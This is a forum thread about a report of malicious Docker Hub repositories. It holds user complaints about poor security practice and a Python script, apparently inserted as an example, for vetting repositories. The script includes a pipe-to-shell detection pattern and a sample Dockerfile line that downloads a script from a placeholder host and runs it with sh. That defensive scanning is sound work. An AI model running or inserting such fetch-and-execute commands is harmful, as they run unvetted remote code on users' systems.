Millions of Docker repos found pushing malware, phishing sites

I don't know why people insist on using shitty pre-configured appliances.

Install and configure it yourself, either bare metal or in a VM. Then you know what's on it.
Heck yeah. My TrueNAS Scale system was built by me from scratch and I wouldn't have it any other way.
 
https://www.bleepingcomputer.com/ne...er-repos-found-pushing-malware-phishing-sites

Why do people try so hard to ruin nice things?

But seriously I knew a lot of docker repositories were bad but 18.7% .... I would not have guessed that.

18.7% :eek:

Still not sure how people are getting bit by these? Are they squatting common typos? I guess people just glance over that they have zero pulls... and then click a random link and get phished or download something!?

I don't know why people insist on using shitty pre-configured appliances.

Install and configure it yourself, either bare metal or in a VM. Then you know what's on it.

Or I just look at the Dockerfile. Then I know what's on it.
 
I don't know why people insist on using shitty pre-configured appliances.

Install and configure it yourself, either bare metal or in a VM. Then you know what's on it.
It is the same people (cough, devs cough) who configure cloud services and leave S3 buckets wide open, RDP wide open on new VMs and skip every other basic security control (do not even add MFA to their AWS root account and use it for day to day tasks....)

Companies keep supporting this because all they want to hire is developers, DevOps (who seldom understand the Ops part) and just want things pushed via a command in GitHub and tadda, we are live! All done...

They somehow think grabbing some pre-configured docker container or app from some random website is safe cause "derp derp"...

Ya, this stuff hits a nerve with me because there are people deploying "infrastructure" who have no bloody business even thinking about doing it, let alone actually doing it.
 
18.7% :eek:

Still not sure how people are getting bit by these? Are they squatting common typos? I guess people just glance over that they have zero pulls... and then click a random link and get phished or download something!?

Or I just look at the Dockerfile. Then I know what's on it.
Because they are the same idiots who just copy and paste random code from GitHub repos because they really have no business being a developer. Some of these malicious actors are sneaky and do copy other projects and use URLs close or names the same and they know most people do not pay any attention these days, just click and go!
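The two checks the posters above describe by hand (notice a near-miss name with zero pulls; read the Dockerfile before you pull) can be scripted. The following is an added example, not code from anyone in this thread or from Docker. Its allowlist of trusted images, the pull-count threshold, and the Dockerfile red-flag patterns are assumptions, and the three sample repositories are constructed stand-ins for what the Docker Hub API and a repo's source page would return.

```python
"""Pre-pull vetting of a Docker Hub repository name and its Dockerfile.

Added example (not code from the thread or from Docker). The repository
metadata and Dockerfiles below are constructed stand-ins for what the
Docker Hub API and a repo's source page would give you; the thresholds
and the allowlist are assumptions, not a published policy.
"""
import re
from typing import Optional

# Assumption: the official images this organisation actually depends on.
TRUSTED_IMAGES = {"nginx", "redis", "postgres", "python", "alpine"}

# Assumption: a repository with fewer pulls than this is treated as unvetted.
MIN_PULL_COUNT = 1000

URL_RE = re.compile(r"https?://\S+")
# A download piped straight into a shell inside a RUN instruction.
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b")
ADD_FROM_URL_RE = re.compile(r"^\s*ADD\s+https?://")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance: insertions, deletions and substitutions."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def typosquat_target(name: str, trusted=None) -> Optional[str]:
    """Return the trusted image this name is a small edit away from, or None."""
    for t in sorted(trusted or TRUSTED_IMAGES):
        if name == t:
            continue
        limit = 2 if len(t) >= 5 else 1   # short names get less slack
        if edit_distance(name, t) <= limit:
            return t
    return None


def vet_repository(meta: dict, dockerfile: Optional[str]) -> list[str]:
    """Return human-readable findings; an empty list means nothing tripped."""
    findings = []
    ns, name = meta["namespace"], meta["name"]

    if name in TRUSTED_IMAGES and ns != "library":
        findings.append(f"{ns}/{name} reuses an official image name outside the library namespace")
    target = typosquat_target(name)
    if target is not None:
        findings.append(f"{name} is within two edits of trusted image {target} (possible typosquat)")

    pulls = meta.get("pull_count", 0)
    if pulls < MIN_PULL_COUNT:
        findings.append(f"pull count {pulls} is below the vetting threshold of {MIN_PULL_COUNT}")

    if dockerfile is None:
        findings.append("no Dockerfile is published, so there is nothing to review before pulling")
        urls = URL_RE.findall(meta.get("description", ""))
        if urls:
            findings.append("description points at external downloads instead: " + ", ".join(urls))
    else:
        for lineno, line in enumerate(dockerfile.splitlines(), 1):
            if PIPE_TO_SHELL_RE.search(line):
                findings.append(f"Dockerfile line {lineno} pipes a download straight into a shell")
            if ADD_FROM_URL_RE.match(line):
                findings.append(f"Dockerfile line {lineno} ADDs content from a remote URL")
    return findings


# Constructed sample repositories keyed by namespace/name.
SAMPLE_REPOS = {
    "library/nginx": (
        {"namespace": "library", "name": "nginx", "pull_count": 5_000_000_000,
         "description": "Official build of nginx."},
        "FROM debian:bookworm-slim\n"
        "RUN apt-get update && apt-get install -y nginx\n"
        'CMD ["nginx", "-g", "daemon off;"]\n',
    ),
    "someuser/ngnix": (
        {"namespace": "someuser", "name": "ngnix", "pull_count": 0,
         "description": "Get the full installer here: http://example.invalid/setup.exe"},
        None,  # imageless repo: only a description page with a link
    ),
    "devtools/buildbox": (
        {"namespace": "devtools", "name": "buildbox", "pull_count": 250_000,
         "description": "Build helper for CI jobs."},
        "FROM alpine:3.19\n"
        "RUN apk add --no-cache curl\n"
        "RUN curl -fsSL http://example.invalid/install.sh | sh\n",
    ),
}


def vet_samples() -> dict[str, list[str]]:
    """Run the check over every constructed sample; used by the demo below."""
    return {repo: vet_repository(meta, df) for repo, (meta, df) in SAMPLE_REPOS.items()}


if __name__ == "__main__":
    for repo, findings in vet_samples().items():
        print(f"{repo}: {'OK' if not findings else ''}")
        for f in findings:
            print(f"  - {f}")
```

The official repo passes clean, the imageless typosquat trips four findings at once (near-miss name, zero pulls, no Dockerfile, a bare download link in the description), and the well-used repo with a respectable pull count still gets flagged because its Dockerfile pipes a remote script into a shell, which is exactly the case a pull count alone would not catch.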
 
It is the same people (cough, devs cough) who configure cloud services and leave S3 buckets wide open, RDP wide open on new VMs and skip every other basic security control (do not even add MFA to their AWS root account and use it for day to day tasks....)

Companies keep supporting this because all they want to hire is developers, DevOps (who seldom understand the Ops part) and just want things pushed via a command in GitHub and tadda, we are live! All done...

They somehow think grabbing some pre-configured docker container or app from some random website is safe cause "derp derp"...

Ya, this stuff hits a nerve with me because there are people deploying "infrastructure" who have no bloody business even thinking about doing it, let alone actually doing it.

That's depressing.

I was reading this article the other day about California's new(ish) law requiring unique passwords for every device (or a system that forces a unique password to be set upon setup).

I googled it after noticing that all of my recent switch, AP and server motherboard purchases came with unique password labels on them that they didn't used to have, and wondered why that happened.

As I was reading it I was thinking to myself "Stupid overreaching California. These servers, access points and other impacted enterprise products are going to be set up by professionals who would never leave a default password in place."

I guess I was wrong. Very wrong.

Maybe California's nannying is the right approach after all...
 
That's depressing.

I was reading this article the other day about California's new(ish) law requiring unique passwords for every device (or a system that forces a unique password to be set upon setup).

I googled it after noticing that all of my recent switch, AP and server motherboard purchases came with unique password labels on them that they didn't used to have, and wondered why that happened.

As I was reading it I was thinking to myself "Stupid overreaching California. These servers, access points and other impacted enterprise products are going to be set up by professionals who would never leave a default password in place."

I guess I was wrong. Very wrong.

Maybe California's nannying is the right approach after all...
I get called in to fix that sort of stuff all the time, cleanup is a bitch and far far too many assume they know what they are doing, it won’t happen to them. They are careful.

Same reason you can expect to see mandatory emergency blade stop devices on table saws sold in the US in the near future.
 
I get called in to fix that sort of stuff all the time, cleanup is a bitch and far far too many assume they know what they are doing, it won’t happen to them. They are careful.

Same reason you can expect to see mandatory emergency blade stop devices on table saws sold in the US in the near future.

I did work for a company that refused to take action on a server that had RDP open to the Internet. I tried everything possible to get them to do _anything_ about the fucking thing. Got shot down on everything.

They got crypto'd a couple years later. A user on said server had a shit password, which let the attacker get on it and lie in wait. Eventually some dipshit logged into it as domain admin and the credentials were harvested.

As a bonus, they used the same password for VMware vCenter. Entire domain and VMware instantly and completely compromised.
 
I get called in to fix that sort of stuff all the time, cleanup is a bitch and far far too many assume they know what they are doing, it won’t happen to them. They are careful.

...but I'm not even a professional. I just play with this stuff in my basement in my house, and even I know better.

How do these people get jobs doing what they do? :eek:
 
...but I'm not even a professional. I just play with this stuff in my basement in my house, and even I know better.

How do these people get jobs doing what they do? :eek:
I know kids at McDonald's who make more than some IT "Professionals" at those companies; you get what you pay for. And if you pay garbage then you get the people who have no other options other than to work for that garbage pay.

The other side of it would be "Professional Installers". They come in, they set it up to the bare bones, then turn over the default information to the manager or owners or whoever with instructions to change it accordingly, and leave. Then they never do, because they are too cheap to hire IT and take it on themselves but don't actually know how to do it.
 
That's depressing.

I was reading this article the other day about California's new(ish) law requiring unique passwords for every device (or a system that forces a unique password to be set upon setup).

I googled it after noticing that all of my recent switch, AP and server motherboard purchases came with unique password labels on them that they didn't used to have, and wondered why that happened.

As I was reading it I was thinking to myself "Stupid overreaching California. These servers, access points and other impacted enterprise products are going to be set up by professionals who would never leave a default password in place."

I guess I was wrong. Very wrong.

Maybe California's nannying is the right approach after all...
Very VERY VERY wrong... sadly :( Look at all these major breaches; it usually comes down to no MFA enabled (Change Healthcare), or admins using crap passwords, or other elevated users using personal devices and getting infected with info-stealers.
 